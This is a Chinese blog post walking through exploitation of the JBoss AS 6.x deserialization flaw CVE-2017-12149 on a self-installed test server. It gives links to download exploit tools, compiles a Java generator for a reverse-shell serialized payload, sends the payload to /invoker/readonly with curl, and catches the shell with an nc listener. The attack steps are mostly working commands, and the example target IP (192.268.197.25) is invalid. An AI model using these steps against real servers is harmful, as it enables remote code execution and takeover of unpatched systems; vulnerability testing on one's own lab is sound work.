码迷,mamicode.com
首页 > 其他好文 > 详细

CVE-2017-12149 JBOOS AS 6.X 反序列化漏洞利用--自测

时间:2017-11-27 20:11:48      阅读:226      评论:0      收藏:0      [点我收藏+]

标签:bin   dep   .com   reverse   javase   default   反序   data-   自测   

1.下载jboss

http://jbossas.jboss.org/downloads/

技术分享图片

2.安装配置,自己百度

3.修改配置,端口和ip远程可以访问

路径:jboss-6.1.0.Final\server\default\deploy\jbossweb.sar\server.xml

技术分享图片

4.启动服务

到bin目录下启动run.bat

技术分享图片

5.访问ip+端口(8082)

技术分享图片

 

6.验证是否存在漏洞

http://ip:8082/invoker/readonly/

技术分享图片

返回500 一般就是存在了。

 

 

7.下载利用工具

原: http://scan.javasec.cn/java/JavaDeserH2HC.zip

使用方法:

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

 

java -cp .:commons-collections-3.2.1.jar  ReverseShellCommonsCollectionsHashMap ip:port //反弹shell的IP和端口

这个时候会生成一个ReverseShellCommonsCollectionsHashMap.ser文件,curl 这个二进制文件就可以了。

ReverseShellCommonsCollectionsHashMap.ser 打包到http://scan.javasec.cn/java/ReverseShellCommonsCollectionsHashMap.ser

curl http://192.268.197.25:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

 

简化的利用工具:

http://scan.javasec.cn/java/jboss_CVE-2017-12149.zip

技术分享图片

 

8.本机机器执行nc 进行端口监听

nc.exe -l -p  1234

 

9.执行利用工具

 技术分享图片

 

 

10.查看反弹

技术分享图片

 

 11.利用成功

 

 

 

 

 

 

 

 

 

参考地址:

http://www.cnblogs.com/sevck/p/7874438.html

 

CVE-2017-12149 JBOOS AS 6.X 反序列化漏洞利用--自测

标签:bin   dep   .com   reverse   javase   default   反序   data-   自测   

原文地址:http://www.cnblogs.com/kllay/p/7905543.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!